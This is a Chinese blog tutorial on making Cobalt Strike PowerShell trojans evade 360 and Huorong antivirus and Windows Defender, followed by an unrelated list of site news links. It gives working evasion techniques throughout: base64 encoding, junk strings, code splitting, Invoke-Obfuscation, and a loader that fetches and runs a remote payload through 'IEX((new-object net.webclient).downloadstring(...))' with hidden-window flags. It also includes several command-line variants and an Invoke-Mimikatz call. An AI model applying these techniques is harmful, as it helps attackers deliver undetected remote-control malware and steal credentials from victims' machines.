PowerShell免杀
要知道powershell免杀就要先知道powershell是什么Windows PowerShell是微软发布的一种命令行利用NET Framework的强大功能Windows7及以上的操作系统目前都是自带的先说明下这边的实验环境安装了火绒和360的win11虚拟机各一台生成powershell远控木马这边使用CS进行生成再CS主界面中选择[有效载荷]---[payload生成器]---[PowerShell]上方选择你的监听器根据你的需求选择勾不勾x64我这是选择的时32位注意powershell有两种模式可以选择两种模式的启用方法各不相同powershell模式文本模式需要命令启动powershell command模式命令模式执行其中的命令即可上线这边使用的时powershell模式介绍完毕后接下来进行免杀操作啦1.特征值编码使用转码器进行base64编码[这边使用SuperSoft进行编码这种东西网上一搜一大把]选择base64把powershell中的恶意部分放的到上面的框编码后输出到下面将编码后的部分放回到原本的位置上记得要在下面加上base64的解密代码否则是运行不了的以下是解密代码或者还想深入了解$DoIt [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64string($DoIt))最终结果就像这样做完记得运行一下看是否能够上线我这边是可以上线测试结果火绒未能查杀 360完成查杀2.第二个方法呢就是[添加干扰项]就是一些无意义的代码我们这边现在编码完成的值里添加这就是我添加了干扰项的部分看得出来加了什么嘛为了不影响代码的运行添加了干扰项后还要在后面加上一句$DoIt$DoIt.Replace(你的干扰项,)用来把加进去的干扰项替换成空字符就像这样操作完之后记得运行一下看看是否能够上线一切就绪之后就可以去实验了实验结果火绒未能查杀 360完成查杀添加干扰项这一方法还能在编码之前就添加干扰项也就是先添加干扰项再进行编码注意干扰项不要插到函数里了插到函数里会破坏函数的连接木马就直接废了而且这样操作之后要把替换语法往下挪一行就像这样做完之后不要忘记运行一下看能不能上线哦一切就绪之后就继续去虚拟机里进行试验了测试结果这次火绒和360都查杀成功可喜可贺~3.分离免杀[这个是大招哦]分离免杀也就是加载器免杀是一种非常好用的免杀方式所谓分离免杀就是将恶意代码放到你的服务器上要对方能够访问到对方运行木马是就会从我们的服务器上将恶意代码下载下来并执行下面是分离木马的语法((New-Object System.Net.Webclient).Downloadstring(http://你的服务器地址已经要访问的文件))就像这样因为是在之前制作的木马基础上制作的所以就保留了替换和解密代码测试结果360和火绒均未能查杀木马也是能顶着两位的压力直接上线4.虽然分离查杀已经很权威了但不妨碍还有其它方法[powershell混淆处理]这个就需要很多东西了在有工具的目录里进入cmd命令行然后开启powershell模式然后使用Import-Module ./Invoke-Obfuscation.psd1加载项目并运行Invoke-obfuscation然后设置需要加密的文件set scriptpath powershell的木马源文件路径设置密码set scriptblock你的密码输入 encoding 进入编码模式输入 1-8 任意想要的加密方式加密完成后使用out 你要输出的位置和输出的名称输出文件然后把输出的文件放到环境中测试测试结果很可惜360和火绒都把木马杀掉了5.那么下面还有方法二次开发就是把编码和混淆融合起来先将代码编码再送去加密步骤应该不用多说了就直接拿做好的木马去测试吧测试结果这回是火绒查杀了但360没能查杀或者把前面的方式都结合一下就能都过了呢嘻嘻6.还有狠的[代码拆分]就是把恶意代码拆开来分别做处理比如这样$DoIt1 代码1 $DoIt1 代码2 当然你可以拆成更多就算拆成商鞅夜行开个玩笑对了不要忘了在下面加上$DoIt$DoIt1$DoIt2我这边是第一部分进行了编码第二部分进行编码并进行了分离编码了的话不要忘记加上解码哦就像这样接下来就开始测试啦测试结果360和火绒都未能查杀还有针对Windows defender的免杀[函数替换(特征值替换)]具体呢就是这样把他这些自带的 $*** 全部替换成我们自定义的 $***特别注意[Byte[]]$var_code这里面放的是经过baes64编码后的监听相关的东西特征非常明显所以要对它进行一个转码这一段我就是用脚本了把 [Byte[]]$var_code 里的内容粘贴到里面去(注意不要粘贴到引号)然后就会进行bytes转码用转码后的把原先的替换掉(这个时候就要连引号一起替换掉了)记得要把[System.Convert]::FromBase64Stringbase64解码方式也删除了接下来看效果测试结果360和火绒都完成了免杀但是进行一个base64编码之后就都过了所以做好的免杀过不了别灰心没准修修改改就过了呢还有还有哦[powershell命令免杀]木马原型powershell -nop -w hidden -c IEx((new-object net.webclient).downloadstring(http://你的服务器地址/你的木马名称.ps1))1.垃圾字符绕过就是在执行命令中加上各种没有用的垃圾字符达到绕过的目的比如powershell -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal set-alias -name key -value IEX; key(New-Object Net.WebClient).DownloadString(http://你的服务器访问地址/你的文件)测试结果360和火绒均完成查杀2.替换绕过把垃圾字符绕过失败的路径复制出来比如中的C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe把这个的末尾修改一下前面添加一个copy比如copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 你的木马名称.txt先把这条命令运行一下然后再运行你的木马名称.txt -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(http://你的服务器地址//你的木马名称.ps1))测试结果火绒和360均完成查杀3.http关键字拆分将http关键字拆的七零八落powershell -nop -w hidden -c $aIEX((New-Object Net.WebClient).DownloadString(ht;$btp://你的服务器地址/你的代码名称.ps1));Invoke-Mimikatz;IEX ($a$b)测试结果还是没能过火绒和360的查杀4.拆分DownloadString关键字powershell $aIEX(New-Object Net.WebClient).Downlo;$b123(http://你的服务器地址/你的木马名称.ps1).Replace(123,adString);IEX ($a$b)测试结果火绒未能完成查杀360完成查杀5.单引号绕过powershell.exe IEX ((new-object net.webclient).downloadstring(ht‘’tp://你的服务器地址/你的木马名称.ps1’))”测试结果emmmmm给我报语法不正确了最简单的果然还是用工具这边用的是[Ladon]emmmmm在我的虚拟机上直接运行不了报错了那么这回就是这些啦

相关新闻

毕设成品、某宝工作室的水有多深?踩过坑的才敢讲

毕设成品、某宝工作室的水有多深?踩过坑的才敢讲

毕设成品、某宝工作室的水有多深?踩过坑的才敢讲如果你正在闲鱼、某宝、QQ群搜「毕设成品」「一条龙」「包过」—— 先看完这篇再付钱。便宜那几百块,可能换来延毕。一、先说结论:不是成品不能用,是绝大多数你在网上买到的成品&am…

2026/7/5 14:22:33阅读更多 →
你的毕设差一个「能讲的亮点」?发题目,我帮你看加什么最划算(免费咨询入口文)

你的毕设差一个「能讲的亮点」?发题目,我帮你看加什么最划算(免费咨询入口文)

你的毕设差一个「能讲的亮点」?发题目,我帮你看加什么最划算(免费咨询入口文)这篇专门给 CSDN 文末 / 闲鱼简介 / 微信置顶 用。 不教完整开发,帮你决策 引流找我。一、90% 的毕设死在「没亮点」 功能齐全但全是 CRUD…

2026/7/5 14:22:33阅读更多 →
2026最新AI Agent从零落地实战指南!小白程序员专属企业级开发教程

2026最新AI Agent从零落地实战指南!小白程序员专属企业级开发教程

本文全方位拆解2026年从零开发企业级AI Agent的完整流程、核心技巧与落地避坑经验,摒弃纯理论空谈,聚焦业务落地与工程实战。区别于传统技术科普,全文主打新手友好、实战为王,覆盖Agent产品定位、通用能力局限、交互设计、任务工程…

2026/7/5 14:17:32阅读更多 →
DataMapper Core核心组件解析:Identity Map如何确保对象唯一性与内存优化

DataMapper Core核心组件解析:Identity Map如何确保对象唯一性与内存优化

DataMapper Core核心组件解析:Identity Map如何确保对象唯一性与内存优化 【免费下载链接】dm-core DataMapper - Core 项目地址: https://gitcode.com/gh_mirrors/dm/dm-core DataMapper Core是一个轻量级的对象关系映射(ORM)框架&am…

2026/7/5 16:42:49阅读更多 →
Swift开发者必看:Objective-C-RegEx-Categories桥接与使用指南

Swift开发者必看:Objective-C-RegEx-Categories桥接与使用指南

Swift开发者必看:Objective-C-RegEx-Categories桥接与使用指南 【免费下载链接】Objective-C-RegEx-Categories NSRegularExpression extensions that make regular expressions easier in Objective-C, Swift, iOS, OSX 项目地址: https://gitcode.com/gh_mirror…

2026/7/5 16:42:49阅读更多 →
ENFUGUE API开发指南:如何集成AI图像生成到你的应用

ENFUGUE API开发指南:如何集成AI图像生成到你的应用

ENFUGUE API开发指南:如何集成AI图像生成到你的应用 【免费下载链接】app.enfugue.ai ENFUGUE is an open-source web app for making studio-grade images and video using generative AI. 项目地址: https://gitcode.com/gh_mirrors/ap/app.enfugue.ai ENF…

2026/7/5 16:42:49阅读更多 →
Topit:终极macOS窗口管理方案,彻底改变你的多任务工作方式

Topit:终极macOS窗口管理方案,彻底改变你的多任务工作方式

Topit:终极macOS窗口管理方案,彻底改变你的多任务工作方式 【免费下载链接】Topit Pin any window to the top of your screen / 在Mac上将你的任何窗口强制置顶 项目地址: https://gitcode.com/gh_mirrors/to/Topit 在macOS系统中,你…

2026/7/5 16:42:49阅读更多 →
Andromeda开发者工具完全指南:REPL、LSP与性能分析

Andromeda开发者工具完全指南:REPL、LSP与性能分析

Andromeda开发者工具完全指南:REPL、LSP与性能分析 【免费下载链接】andromeda JS runtime lolz 项目地址: https://gitcode.com/gh_mirrors/andromeda18/andromeda 想要快速提升JavaScript和TypeScript开发效率吗?Andromeda作为一款基于Rust构建…

2026/7/5 16:42:49阅读更多 →
sw-test核心代码解密:cacheFirst策略如何提升Web应用性能

sw-test核心代码解密:cacheFirst策略如何提升Web应用性能

sw-test核心代码解密:cacheFirst策略如何提升Web应用性能 【免费下载链接】sw-test Service Worker test repository. This is a very simple demo to show basic service worker features in action. 项目地址: https://gitcode.com/gh_mirrors/sw/sw-test …

2026/7/5 16:37:48阅读更多 →
从GitHub安全案例解析常见漏洞与防护实践

从GitHub安全案例解析常见漏洞与防护实践

1. 项目概述:从GitHub Trending看安全实战 最近在GitHub Trending上看到一个项目,叫 skills4/skills ,它因为一些安全漏洞案例被大家讨论。这其实是一个挺典型的场景:一个旨在展示或教授某种技能的仓库,本身却成了安…

2026/7/5 0:01:08阅读更多 →
MLT 2026启示:因果推理与概率建模驱动下一代LLM应用

MLT 2026启示:因果推理与概率建模驱动下一代LLM应用

# MLT 2026启示:因果推理与概率建模驱动下一代LLM应用## 一、背景与挑战:从“黑箱预测”到“可信推理”2026年6月,第7届机器学习与趋势国际会议(MLT 2026)将在悉尼召开。会议议程中,“因果与可解释机器学习…

2026/7/5 0:01:08阅读更多 →
通达OA SQL注入漏洞深度剖析:从手工注入到自动化利用与防御

通达OA SQL注入漏洞深度剖析:从手工注入到自动化利用与防御

1. 项目概述与漏洞背景最近在梳理一些历史OA系统的安全风险时,通达OA v11.6版本中的一个老漏洞又进入了我的视线。这个漏洞位于/general/bi_design/appcenter/report_bi.func.php文件中,是一个典型的SQL注入点。虽然这个漏洞的利用方式看起来并不复杂&am…

2026/7/5 0:01:08阅读更多 →
从GitHub安全案例解析常见漏洞与防护实践

从GitHub安全案例解析常见漏洞与防护实践

1. 项目概述:从GitHub Trending看安全实战 最近在GitHub Trending上看到一个项目,叫 skills4/skills ,它因为一些安全漏洞案例被大家讨论。这其实是一个挺典型的场景:一个旨在展示或教授某种技能的仓库,本身却成了安…

2026/7/5 0:01:08阅读更多 →
MLT 2026启示:因果推理与概率建模驱动下一代LLM应用

MLT 2026启示:因果推理与概率建模驱动下一代LLM应用

# MLT 2026启示:因果推理与概率建模驱动下一代LLM应用## 一、背景与挑战:从“黑箱预测”到“可信推理”2026年6月,第7届机器学习与趋势国际会议(MLT 2026)将在悉尼召开。会议议程中,“因果与可解释机器学习…

2026/7/5 0:01:08阅读更多 →
通达OA SQL注入漏洞深度剖析:从手工注入到自动化利用与防御

通达OA SQL注入漏洞深度剖析:从手工注入到自动化利用与防御

1. 项目概述与漏洞背景最近在梳理一些历史OA系统的安全风险时,通达OA v11.6版本中的一个老漏洞又进入了我的视线。这个漏洞位于/general/bi_design/appcenter/report_bi.func.php文件中,是一个典型的SQL注入点。虽然这个漏洞的利用方式看起来并不复杂&am…

2026/7/5 0:01:08阅读更多 →
YOLOv8推理性能优化:从1.2FPS到35FPS的全链路加速实践

YOLOv8推理性能优化:从1.2FPS到35FPS的全链路加速实践

如果你在部署 YOLOv8 时,发现推理速度只有可怜的 1-2 FPS,而别人的演示视频却能跑到 30 FPS 以上,那么问题很可能不在模型本身,而在于你的整个处理链路。很多开发者拿到一个训练好的 YOLOv8 模型后,会直接使用官方示例…

2026/7/5 1:30:27阅读更多 →
Coze与Dify对比指南:低代码AI应用开发从入门到实战

Coze与Dify对比指南:低代码AI应用开发从入门到实战

1. 从零到一:为什么你需要了解 Coze 和 Dify?如果你对 AI 应用开发感兴趣,但一看到“大模型”、“智能体”、“工作流”这些词就头疼,觉得门槛太高,那这篇文章就是为你准备的。很多开发者,包括我自己&#…

2026/7/5 3:48:10阅读更多 →
AI生图工具怎么选?2026年6月版实测对比

AI生图工具怎么选?2026年6月版实测对比

做自媒体的朋友应该都有体会:配图一直是个让人头疼的问题。2026年,AI生图工具已经非常成熟了,但工具太多反而不知道怎么选。以下是截至2026年6月我对主流AI生图工具的实测对比。Midjourney V8.1:速度之王2026年6月11日&#xff0c…

2026/7/5 3:48:09阅读更多 →